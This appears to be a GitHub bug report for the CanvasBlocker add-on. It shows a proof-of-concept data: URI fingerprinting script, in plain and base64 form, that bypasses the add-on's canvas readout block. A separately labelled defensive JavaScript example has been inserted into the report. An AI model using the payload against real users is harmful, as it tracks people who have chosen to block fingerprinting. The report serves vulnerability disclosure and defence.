Data URI scheme bypasses the readout API block
Description
Using a Data URI scheme instead of a classic HTML/JS page bypasses the readout API block.
Expected Behavior
The readout API block, if set in the add-on configuration, should work in any circumstance.
Current Behavior
Despite the readout API block being set in the add-on configuration, a Data URI scheme can execute code able to read out (and write) from Canvas.
Steps to Reproduce (for bugs)
Paste this simple fingerprinting code (not very fingerprinting, it's just a concept) in the browser URL bar and it will pop up your fingerprinted id:
data:text/html,<html><head><script>window.onload=showId;function showId(){var CanvaS,ctxS,ciS,S,W,H;var e=0.0;var C=document.createElement("canvas");C.width=400;C.height=400;C.id="canvasS";document.body.appendChild(C);CanvaS=document.getElementById("canvasS");ctxS=CanvaS.getContext("2d");W=CanvaS.width;H=CanvaS.height;ctxS.textBaseline="top";ctxS.font="1.01emOptimer,verdana";ctxS.fillStyle="rgba(255,255,255,1)";ctxS.fillText("Test",0,0);ciS=ctxS.getImageData(0,0,W,H);S=ciS.data;for(var x=0;x<W*H*4;x++){e=e+S[x]*x;}alert("id:"+e);}</script></head></html>
It uses getImageData to elaborate how the text 'Test' is rendered.
Context
I did some research and it seems that Firefox (as well as other browsers) now limits the ways a Data URI scheme can be used. I tried to use it as an iframe, as a link, as a pop-up window and as an image source, with no success (luckily). I even tried to use the base64-encoded version (to avoid problems with escaping characters and such):
data:text/html;base64,PGh0bWw+PGhlYWQ+PHNjcmlwdD53aW5kb3cub25sb2FkPXNob3dJZDtmdW5jdGlvbiBzaG93SWQoKXt2YXIgQ2FudmFTLGN0eFMsY2lTLFMsVyxIO3ZhciBlPTAuMDt2YXIgQz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJjYW52YXMiKTtDLndpZHRoPTQwMDtDLmhlaWdodD00MDA7Qy5pZD0iY2FudmFzUyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChDKTtDYW52YVM9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImNhbnZhc1MiKTtjdHhTPUNhbnZhUy5nZXRDb250ZXh0KCIyZCIpO1c9Q2FudmFTLndpZHRoO0g9Q2FudmFTLmhlaWdodDtjdHhTLnRleHRCYXNlbGluZT0idG9wIjtjdHhTLmZvbnQ9IjEuMDFlbU9wdGltZXIsdmVyZGFuYSI7Y3R4Uy5maWxsU3R5bGU9InJnYmEoMjU1LDI1NSwyNTUsMSkiO2N0eFMuZmlsbFRleHQoIlRlc3QiLDAsMCk7Y2lTPWN0eFMuZ2V0SW1hZ2VEYXRhKDAsMCxXLEgpO1M9Y2lTLmRhdGE7Zm9yKHZhciB4PTA7eDxXKkgqNDt4Kyspe2U9ZStTW3hdKng7fWFsZXJ0KCJpZDoiK2UpO308L3NjcmlwdD48L2hlYWQ+PC9odG1sPg==
It still works when manually pasted into the URL bar, but it does not work in any other way I tested.
But here is the problem: in the end I tested the code in combination with a service that compresses the HTML/JS code and then decompresses it in real time into data:text (the service is https://itty.bitty.site). And here is the final exploit:
malicious link that can bypass readout blocking
Your Environment
- CanvasBlocker Version used: 0.4.5c
- Firefox version: 61.0.1 (64-bit)
- Operating System and version (desktop): Windows 7 ultimate 64-bit
Your Settings
{
  "logLevel": 1,
  "urlSettings": [],
  "whiteList": "",
  "blackList": "",
  "blockMode": "blockReadout",
  "minFakeSize": 1,
  "maxFakeSize": 0,
  "rng": "nonPersistent",
  "apiWhiteList": {},
  "useCanvasCache": true,
  "ignoreFrequentColors": 0,
  "minColors": 0,
  "fakeAlphaChannel": false,
  "persistentRndStorage": "",
  "storePersistentRnd": false,
  "persistentRndClearIntervalValue": 0,
  "persistentRndClearIntervalUnit": "days",
  "lastPersistentRndClearing": 0,
  "askOnlyOnce": "individual",
  "askDenyMode": "block",
  "showCanvasWhileAsking": true,
  "showNotifications": true,
  "storeImageForInspection": false,
  "notificationDisplayTime": 30,
  "ignoreList": "",
  "showCallingFile": false,
  "showCompleteCallingStack": false,
  "enableStackList": false,
  "stackList": "",
  "displayAdvancedSettings": true,
  "displayDescriptions": false,
  "isStillDefault": false,
  "storageVersion": 0.3
}
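The following is an added example, not CanvasBlocker's own code and not part of the original report. It assumes (an assumption, not something the issue states) that a "blockReadout" mode works the way most canvas-privacy add-ons do: a script injected into each page replaces the readout methods on the page's canvas prototypes. The example installs such a block against whatever global object it is handed, and pairs it with a probe that draws a known pixel and reports whether the readout is blocked, faked, or fully readable. Run the probe in a normal page and then in a data: document to see whether the wrapper is present in both; a block that lives only in injected page scripts cannot protect a document the script was never injected into. The `HTMLCanvasElement` and `CanvasRenderingContext2D` stand-ins are constructed here so the example runs in Node without a browser.

```javascript
// Added example: a minimal readout block in the style of a privacy add-on,
// plus a probe that reports whether the block is active in a given context.
// Nothing here is CanvasBlocker's implementation.

// Methods that let a script read rendered pixels back out of a canvas.
// Assumption: blocking these is what a "blockReadout" mode amounts to.
const READOUT_METHODS = {
  CanvasRenderingContext2D: ["getImageData"],
  HTMLCanvasElement: ["toDataURL", "toBlob"],
};

// Replace each readout method on the prototypes found in `globalObj` with one
// that throws. `globalObj` is passed in so the same code runs against a real
// `window` in a page or against the constructed stand-in below in Node.
// Returns how many methods were wrapped (0 means nothing was protected).
function installReadoutBlock(globalObj) {
  let wrapped = 0;
  for (const [ctorName, methods] of Object.entries(READOUT_METHODS)) {
    const ctor = globalObj[ctorName];
    if (!ctor || !ctor.prototype) continue; // API absent in this context
    for (const name of methods) {
      if (typeof ctor.prototype[name] !== "function") continue;
      Object.defineProperty(ctor.prototype, name, {
        configurable: true,
        writable: true,
        value: function blocked() {
          throw new Error(`canvas readout blocked: ${ctorName}.${name}`);
        },
      });
      wrapped++;
    }
  }
  return wrapped;
}

// Probe: draw one opaque white pixel and try to read it back.
// "blocked"  - readout threw (the block is active in this document)
// "readable" - the real pixel came back (no protection here)
// "faked"    - readout succeeded but the pixel was altered on the way out
function probeReadout(canvas) {
  const ctx = canvas.getContext("2d");
  ctx.fillStyle = "rgba(255,255,255,1)";
  ctx.fillRect(0, 0, 1, 1);
  let data;
  try {
    data = ctx.getImageData(0, 0, 1, 1).data;
  } catch (e) {
    return "blocked";
  }
  const [r, g, b, a] = data;
  return r === 255 && g === 255 && b === 255 && a === 255 ? "readable" : "faked";
}

// Constructed stand-in for a 1x1 canvas so the example runs outside a browser.
// Each call returns fresh classes, mimicking a fresh document's globals.
function makeFakeGlobal() {
  class CanvasRenderingContext2D {
    constructor(pixels) { this.pixels = pixels; this.fillStyle = "rgba(0,0,0,0)"; }
    fillRect() {
      // Parse "rgba(r,g,b,a)" (alpha 0..1) into the RGBA pixel buffer.
      const m = /rgba\((\d+),(\d+),(\d+),([\d.]+)\)/.exec(this.fillStyle);
      if (m) this.pixels.set([+m[1], +m[2], +m[3], Math.round(+m[4] * 255)]);
    }
    getImageData() { return { data: Uint8ClampedArray.from(this.pixels) }; }
  }
  class HTMLCanvasElement {
    constructor() { this.pixels = new Uint8ClampedArray(4); }
    getContext() { return new CanvasRenderingContext2D(this.pixels); }
    toDataURL() { return "data:image/png;base64,"; }
    toBlob(cb) { cb(null); }
  }
  return { CanvasRenderingContext2D, HTMLCanvasElement };
}

// Usage: probe an unprotected context, install the block, probe again.
function demo() {
  const g = makeFakeGlobal();
  const before = probeReadout(new g.HTMLCanvasElement());
  const wrapped = installReadoutBlock(g);
  const after = probeReadout(new g.HTMLCanvasElement());
  return { before, wrapped, after };
}

console.log(demo()); // { before: 'readable', wrapped: 3, after: 'blocked' }
```

In a real page the call would be `installReadoutBlock(window)` from the add-on's injected script and `probeReadout(document.createElement("canvas"))` from the console; the probe deliberately separates a thrown block from a modified readout, because the settings above show the add-on also has fake-readout modes (`minFakeSize`, `fakeAlphaChannel`) whose effect looks different from a plain block.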
Issue Analytics
- State:
- Created 5 years ago
- Reactions:1
- Comments:15 (13 by maintainers)
Top GitHub Comments
Gave my vote on both bugzillas.
Second bug which prevented a workaround: https://bugzilla.mozilla.org/show_bug.cgi?id=1475832